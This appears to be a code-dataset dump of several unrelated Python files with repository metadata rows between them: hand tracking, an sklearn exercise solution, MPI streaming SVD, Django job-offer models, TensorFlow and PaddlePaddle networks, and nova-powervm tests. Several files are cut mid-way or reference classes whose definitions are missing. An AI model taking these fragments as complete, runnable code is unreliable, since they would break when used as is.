# if np.prod(env.observation_space.shape) >= max_flat_dim:
# self.max_observation_space_index = i
# max_flat_dim = np.prod(env.observation_space.shape)
# self._max_plain_dim = max_flat_dim
# super().__init__(envs[self.max_observation_space_index])
# self._task_envs = []
# for i, env in enumerate(envs):
# if env.action_space.shape != self.env.action_space.shape:
# raise ValueError('Action space of all envs should be same.')
# self._task_envs.append(env)
# self.env.spec.observation_space = self._task_envs[self.max_observation_space_index].observation_space
# @property
# def num_tasks(self):
# """Total number of tasks.
# Returns:
# int: number of tasks.
# """
# return len(self._task_envs)
# @property
# def task_space(self):
# """Task Space.
# Returns:
# akro.Box: Task space.
# """
# one_hot_ub = np.ones(self.num_tasks)
# one_hot_lb = np.zeros(self.num_tasks)
# return akro.Box(one_hot_lb, one_hot_ub)
# @property
# def active_task_index(self):
# """Index of active task env.
# Returns:
# int: Index of active task.
# """
# return self._active_task_index
# @property
# def observation_space(self):
# """Observation space.
# Returns:
# akro.Box: Observation space.
# """
# task_lb, task_ub = self.task_space.bounds
# env_lb, env_ub = self._observation_space.bounds
# return akro.Box(np.concatenate([task_lb, env_lb]),
# np.concatenate([task_ub, env_ub]))
# @observation_space.setter
# def observation_space(self, observation_space):
# """Observation space setter.
# Args:
# observation_space (akro.Box): Observation space.
# """
# self._observation_space = observation_space
# @property
# def active_task_one_hot(self):
# """One-hot representation of active task.
# Returns:
# numpy.ndarray: one-hot representation of active task
# """
# one_hot = np.zeros(self.task_space.shape)
# index = self.active_task_index or 0
# one_hot[index] = self.task_space.high[index]
# return one_hot
# def reset(self, **kwargs):
# """Sample new task and call reset on new task env.
# Args:
# kwargs (dict): Keyword arguments to be passed to gym.Env.reset
# Returns:
# numpy.ndarray: active task one-hot representation + observation
# """
# self._active_task_index = self._sample_strategy(
# self._num_tasks, self._active_task_index)
# self.env = self._task_envs[self._active_task_index]
# obs = self.env.reset(**kwargs)
# obs = self._augment_observation(obs)
# oh_obs = self._obs_with_one_hot(obs)
# return oh_obs
# def step(self, action):
# """gym.Env step for the active task env.
# Args:
# action (object): object to be passed in gym.Env.reset(action)
# Returns:
# object: agent's observation of the current environment
# float: amount of reward returned after previous action
# bool: whether the episode has ended
# dict: contains auxiliary diagnostic information
# """
# obs, reward, done, info = self.env.step(action)
# obs = self._augment_observation(obs)
# oh_obs = self._obs_with_one_hot(obs)
# info['task_id'] = self._active_task_index
# return oh_obs, reward, done, info
# def _augment_observation(self, obs):
# # optionally zero-pad observation
# if np.prod(obs.shape) < self._max_plain_dim:
# zeros = np.zeros(
# shape=(self._max_plain_dim - np.prod(obs.shape),)
# )
# obs = np.concatenate([obs, zeros])
# return obs
# def close(self):
# """Close all task envs."""
# for env in self._task_envs:
# env.close()
# def _obs_with_one_hot(self, obs):
# """Concatenate active task one-hot representation with observation.
# Args:
# obs (numpy.ndarray): observation
# Returns:
# numpy.ndarray: active task one-hot + observation
# """
# oh_obs = np.concatenate([self.active_task_one_hot, obs])
# return oh_obs
| 29.305882 | 111 | 0.607226 |
6214cfd0d71589122131f56a39aa2ef13d007862 | 773 | py | Python | MyNewHandTracking.py | Hai-Hoang-88/HandTracking | c35cf442c4305a48ac1182570c266df4d3b877dd | [
"Unlicense"
] | null | null | null | MyNewHandTracking.py | Hai-Hoang-88/HandTracking | c35cf442c4305a48ac1182570c266df4d3b877dd | [
"Unlicense"
] | null | null | null | MyNewHandTracking.py | Hai-Hoang-88/HandTracking | c35cf442c4305a48ac1182570c266df4d3b877dd | [
"Unlicense"
] | null | null | null | import cv2
import mediapipe as mp
import time
import HandTracking_module as htm
# initiate time
pTime = 0
cTime = 0
cap = cv2.VideoCapture(0) # 0 is internal camera, while 1 is external camera
detector = htm.handDetector()
while True:
success, img = cap.read()
img = detector.findHands(img) # get para img and put in definition
lmList = detector.findPosition(img, draw=False) # if no draw=True, will draw a circle
if len(lmList) != 0:
print(lmList[4])
# time for fbs
cTime = time.time()
fbs = 1/(cTime - pTime)
pTime = cTime
# put txt on the image
cv2.putText(img, str(int(fbs)), (10, 70), cv2.FONT_ITALIC, 3,
(255, 0, 255), 3)
cv2.imshow("Image", img)
cv2.waitKey(1) | 27.607143 | 91 | 0.619664 |
62170b104a1052dcd0eae68ee028a14da9c51172 | 2,113 | py | Python | exercises/en/solution_07_23.py | hfboyce/MCL-DSCI-571-machine-learning | 25757369491ac547daa94ff1143ca7389d433a6e | [
"MIT"
] | 1 | 2020-09-12T15:40:11.000Z | 2020-09-12T15:40:11.000Z | exercises/en/solution_07_23.py | hfboyce/MCL-DSCI-571-machine-learning | 25757369491ac547daa94ff1143ca7389d433a6e | [
"MIT"
] | 13 | 2020-10-02T16:48:24.000Z | 2020-12-09T18:58:21.000Z | exercises/en/solution_07_23.py | hfboyce/MCL-DSCI-571-machine-learning | 25757369491ac547daa94ff1143ca7389d433a6e | [
"MIT"
] | 2 | 2020-10-28T19:43:42.000Z | 2021-03-30T22:57:47.000Z | import numpy as np
import pandas as pd
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
from sklearn.model_selection import train_test_split, cross_validate
from sklearn.preprocessing import OneHotEncoder, StandardScaler, OrdinalEncoder
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer, make_column_transformer
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.svm import SVC
# Loading in the data
pk_df = pd.read_csv('data/pokemon.csv')
train_df, test_df = train_test_split(pk_df, test_size=0.2, random_state=1)
X_train = train_df.drop(columns=['legendary'])
y_train = train_df['legendary']
X_test = test_df.drop(columns=['legendary'])
y_test = test_df['legendary']
numeric_features = ["deck_no",
"attack",
"defense" ,
"sp_attack",
"sp_defense",
"speed",
"capture_rt",
"total_bs"]
categorical_features = ["type"]
numeric_transformer = make_pipeline(SimpleImputer(strategy="median"), StandardScaler())
categorical_transformer = make_pipeline(
SimpleImputer(strategy="most_frequent"),
OneHotEncoder(handle_unknown="ignore"))
preprocessor = make_column_transformer(
(numeric_transformer, numeric_features),
(categorical_transformer, categorical_features))
# Build a pipeline containing the column transformer and an SVC model
# Use the parameter class_weight="balanced"
# Name this pipeline main_pipe
main_pipe = make_pipeline(preprocessor, SVC(class_weight="balanced"))
# Perform cross validation on the training split using the scoring measures accuracy, precision and recall
# Save the results in a dataframe named multi_scores
multi_scores = pd.DataFrame(cross_validate(main_pipe,
X_train,
y_train,
return_train_score=True,
scoring = ['accuracy', 'precision', 'recall']))
multi_scores
| 37.732143 | 107 | 0.681496 |
6217c3865432b1a663db3913c183c3b2bdd9e8cf | 53 | py | Python | src/algorithm/__init__.py | ShogoAkiyama/metaworld.pytorch | 6b08163d2c0d73b6d1d9b4b513d18f0a308e92c4 | [
"MIT"
] | null | null | null | src/algorithm/__init__.py | ShogoAkiyama/metaworld.pytorch | 6b08163d2c0d73b6d1d9b4b513d18f0a308e92c4 | [
"MIT"
] | null | null | null | src/algorithm/__init__.py | ShogoAkiyama/metaworld.pytorch | 6b08163d2c0d73b6d1d9b4b513d18f0a308e92c4 | [
"MIT"
] | null | null | null | from .sac import SAC
from .eval import EvalAlgorithm
| 17.666667 | 31 | 0.811321 |
6218792313b28bf05b712a8e421f24aaaa0f9100 | 8,110 | py | Python | Parallel_POD/online_svd_parallel.py | Romit-Maulik/Tutorials-Demos-Practice | a58ddc819f24a16f7059e63d7f201fc2cd23e03a | [
"MIT"
] | 8 | 2020-09-02T14:46:07.000Z | 2021-11-29T15:27:05.000Z | Parallel_POD/online_svd_parallel.py | omersan/Practice | 77eecdc2a202e6b333123cfd92e7db6dc0eea021 | [
"MIT"
] | 18 | 2020-11-13T18:49:33.000Z | 2022-03-12T00:54:43.000Z | Parallel_POD/online_svd_parallel.py | omersan/Practice | 77eecdc2a202e6b333123cfd92e7db6dc0eea021 | [
"MIT"
] | 5 | 2019-09-25T23:57:00.000Z | 2021-04-18T08:15:34.000Z | import numpy as np
np.random.seed(10)
import matplotlib.pyplot as plt
from mpi4py import MPI
# For shared memory deployment: `export OPENBLAS_NUM_THREADS=1`
# Method of snapshots
def generate_right_vectors(A):
'''
A - Snapshot matrix - shape: NxS
returns V - truncated right singular vectors
'''
new_mat = np.matmul(np.transpose(A),A)
w, v = np.linalg.eig(new_mat)
svals = np.sqrt(np.abs(w))
rval = np.argmax(svals<0.0001) # eps0
return v[:,:rval], np.sqrt(np.abs(w[:rval])) # Covariance eigenvectors, singular values
# Randomized SVD to accelerate
# Check orthogonality
if __name__ == '__main__':
from time import time
# Initialize timer
start_time = time()
test_class = online_svd_calculator(10,1.0,low_rank=True)
iteration = 0
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.initialize(data)
for iteration in range(1,4):
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.incorporate_data(data)
end_time = time()
print('Time required for parallel streaming SVD (each rank):', end_time-start_time)
test_class.gather_modes() | 30.954198 | 108 | 0.569667 |
62190035d82be78029e09978dd1bef9d1d34feb6 | 12,887 | py | Python | joboffers/models.py | Devecoop/pyarweb | ee42f0aa871569cc30a6a678dcdc43293d38c0bb | [
"Apache-2.0"
] | 1 | 2022-01-14T18:38:25.000Z | 2022-01-14T18:38:25.000Z | joboffers/models.py | Devecoop/pyarweb | ee42f0aa871569cc30a6a678dcdc43293d38c0bb | [
"Apache-2.0"
] | 37 | 2022-01-17T14:41:51.000Z | 2022-02-16T13:50:05.000Z | joboffers/models.py | Devecoop/pyarweb | ee42f0aa871569cc30a6a678dcdc43293d38c0bb | [
"Apache-2.0"
] | null | null | null | import html
import json
import re
from datetime import date
from autoslug import AutoSlugField
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.core.validators import MinLengthValidator
from django.db.models.aggregates import Count
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from django.utils.timezone import now
from django.utils.translation import gettext as _
from easyaudit.models import CRUDEvent
from taggit_autosuggest.managers import TaggableManager
from pycompanies.models import UserCompanyProfile
from .constants import STATE_LABEL_CLASSES
def get_publisher_mail_addresses(self):
"""
Return a list of the email addresses of the publishers of this offer.
It filters users with empty mail field
"""
profiles = UserCompanyProfile.objects.filter(company=self.company)
addresses = set()
for profile in profiles:
if profile.user.email:
addresses.add(profile.user.email)
return addresses
def get_visualizations_count(self):
"""
Get a dict with visualizations count for every kind of event
"""
items = JobOfferAccessLog.objects \
.filter(joboffer=self) \
.values_list('event_type') \
.annotate(total=Count('event_type')) \
.order_by()
return dict(items)
def save(self, *args, **kwargs):
self.slug = slugify(self.title)
if not self.short_description:
self.short_description = self.get_short_description(self.description)
super().save(*args, **kwargs)
class CommentType(models.TextChoices):
"""
Choices for Types of JobOfferComments.
"""
MODERATION = 'MODERATION', _('Moderacin')
EDITION = 'EDITION', _('Edicin')
SPAM = 'SPAM', _('Spam')
INSUFICIENT = 'INSUFICIENT', _('Informacin insuficiente')
NOT_RELATED = 'NOT_PYTHON', _('Oferta no relacionada con Python')
class JobOfferComment(models.Model):
"""
A comment on a JobOffer.
"""
text = models.TextField(verbose_name=_('Texto'))
comment_type = models.CharField(
max_length=32, choices=CommentType.choices, verbose_name=_('Tipo'))
created_at = models.DateTimeField(
auto_now_add=True, verbose_name=_('Rango salarial')
)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
verbose_name=_('Creado por'),
related_name='created_joboffer_comments',
)
joboffer = models.ForeignKey(JobOffer, on_delete=models.CASCADE)
class JobOfferHistoryManager(models.Manager):
def for_offer(self, joboffer):
"""
Get all the history objects for a given joboffer. It can be JobOffer and JobOfferComment
"""
qs = super().get_queryset()
offer_ctype = ContentType.objects.get(app_label='joboffers', model='joboffer')
offer_comment_ctype = ContentType.objects.get(
app_label='joboffers', model='joboffercomment'
)
offer_q = models.Q(event_type__lt=4, object_id=joboffer.id, content_type=offer_ctype)
offer_comment_ids = [
offer_comment.id for offer_comment in joboffer.joboffercomment_set.all()
]
offer_comment_q = models.Q(
object_id__in=offer_comment_ids, content_type=offer_comment_ctype
)
qs = qs.filter(offer_q | offer_comment_q)
return qs
class JobOfferHistory(CRUDEvent):
"""
This is a proxy model used to simplify the code take away all the logic from the controller
"""
objects = JobOfferHistoryManager()
class Meta:
proxy = True
class JobOfferAccessLog(models.Model):
"""
Model to track visualization of joboffers
"""
created_at = models.DateTimeField(default=now)
month_and_year = models.PositiveIntegerField()
event_type = models.PositiveSmallIntegerField(
choices=EventType.choices, verbose_name=_('Tipo de Evento')
)
session = models.CharField(max_length=40, verbose_name=_('Identificador de Sesin'))
joboffer = models.ForeignKey(JobOffer, on_delete=models.CASCADE)
| 32.298246 | 96 | 0.632575 |
621946fa869b479764d5f279c948e790f062b5f0 | 32,670 | py | Python | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 29 | 2020-07-28T03:11:21.000Z | 2022-03-09T04:37:47.000Z | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 8 | 2020-08-19T06:40:42.000Z | 2022-03-07T03:48:57.000Z | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 7 | 2020-07-20T09:05:17.000Z | 2021-11-26T13:04:25.000Z | # --------------------------------------------------------
# Tensorflow VCL
# Licensed under The MIT License [see LICENSE for details]
# Written by Zhi Hou, based on code from Transferable-Interactiveness-Network, Chen Gao, Zheqi he and Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.slim import arg_scope
from tensorflow.contrib.slim.python.slim.nets import resnet_utils
from tensorflow.contrib.slim.python.slim.nets import resnet_v1
from tensorflow.python.framework import ops
from ult.tools import get_convert_matrix
from ult.config import cfg
from ult.visualization import draw_bounding_boxes_HOI
import numpy as np
| 52.949757 | 158 | 0.589654 |
621b663ff688adbcc08ffd8203aafeded181974f | 7,738 | py | Python | nova_powervm/tests/virt/powervm/test_mgmt.py | openstack/nova-powervm | 376d9493e2a10313068508daf9054d7ecf6d121f | [
"Apache-2.0"
] | 24 | 2015-10-18T02:55:20.000Z | 2021-11-17T11:43:51.000Z | nova_powervm/tests/virt/powervm/test_mgmt.py | openstack/nova-powervm | 376d9493e2a10313068508daf9054d7ecf6d121f | [
"Apache-2.0"
] | null | null | null | nova_powervm/tests/virt/powervm/test_mgmt.py | openstack/nova-powervm | 376d9493e2a10313068508daf9054d7ecf6d121f | [
"Apache-2.0"
] | 12 | 2015-10-26T17:38:05.000Z | 2021-07-21T12:45:19.000Z | # Copyright 2015, 2017 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import retrying
from nova import exception
from nova import test
from pypowervm.tests import test_fixtures as pvm_fx
from pypowervm.tests.test_utils import pvmhttp
from nova_powervm.virt.powervm import exception as npvmex
from nova_powervm.virt.powervm import mgmt
LPAR_HTTPRESP_FILE = "lpar.txt"
| 40.093264 | 79 | 0.652106 |
621e1832f00c1f8797826395cfb9b871267408f4 | 960 | py | Python | tools.py | fairuzap97/psgan | 18d49d3d9e6dcb66e019764141fc855d04e4b25b | [
"MIT"
] | 29 | 2018-02-16T09:56:08.000Z | 2022-01-27T16:22:40.000Z | tools.py | fairuzap97/psgan | 18d49d3d9e6dcb66e019764141fc855d04e4b25b | [
"MIT"
] | null | null | null | tools.py | fairuzap97/psgan | 18d49d3d9e6dcb66e019764141fc855d04e4b25b | [
"MIT"
] | 16 | 2018-09-24T21:16:25.000Z | 2021-09-26T09:22:07.000Z | # -*- coding: utf-8 -*-
import sys, os
from time import time
def create_dir(folder):
'''
creates a folder, if necessary
'''
if not os.path.exists(folder):
os.makedirs(folder)
if __name__=="__main__":
print("this is just a library.")
| 24.615385 | 145 | 0.591667 |
621e26224a5b7df57e76176ccf102f633408ef39 | 290 | py | Python | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from .t_catch_event import TCatchEvent
__NAMESPACE__ = "http://www.omg.org/spec/BPMN/20100524/MODEL"
| 24.166667 | 65 | 0.731034 |
621f31f3e4ecd411a063519956fdcb002c6f41f7 | 1,305 | py | Python | jarviscli/plugins/advice_giver.py | hugofpaiva/Jarvis | 8c7bec950fa2850cba635e2dfcb45e3e8107fbf2 | [
"MIT"
] | null | null | null | jarviscli/plugins/advice_giver.py | hugofpaiva/Jarvis | 8c7bec950fa2850cba635e2dfcb45e3e8107fbf2 | [
"MIT"
] | null | null | null | jarviscli/plugins/advice_giver.py | hugofpaiva/Jarvis | 8c7bec950fa2850cba635e2dfcb45e3e8107fbf2 | [
"MIT"
] | null | null | null | import random
from plugin import plugin
ANSWERS = [
"No",
"Yes",
"You Can Do It!",
"I Cant Help You",
"Sorry To hear That, But You Must Forget :(",
"Keep It Up!",
"Nice",
"Dont Do It Ever Again",
"I Like It, Good Job",
"I Am Not Certain",
"Too Bad For You, Try To Find Something Else To Do And Enjoy",
"Time Will Pass And You Will Forget",
"Dont Do It",
"Do It",
"Never Ask Me About That Again",
"I Cant Give Advice Now I Am Sleepy",
"Sorry I Cant Hear This Language",
"Sorry But Your Question Does Not Make Sense"
]
| 27.765957 | 65 | 0.556322 |
621f442528eb038457c4f4d99ef47c676a11ad6e | 3,204 | py | Python | PaddleRec/text_matching_on_quora/models/sse.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 5 | 2021-09-28T13:28:01.000Z | 2021-12-21T07:25:44.000Z | PaddleRec/text_matching_on_quora/models/sse.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 2 | 2019-06-26T03:21:49.000Z | 2019-09-19T09:43:42.000Z | PaddleRec/text_matching_on_quora/models/sse.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 3 | 2019-10-31T07:18:49.000Z | 2020-01-13T03:18:39.000Z | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid as fluid
from .my_layers import bi_lstm_layer
from .match_layers import ElementwiseMatching
| 39.073171 | 79 | 0.5902 |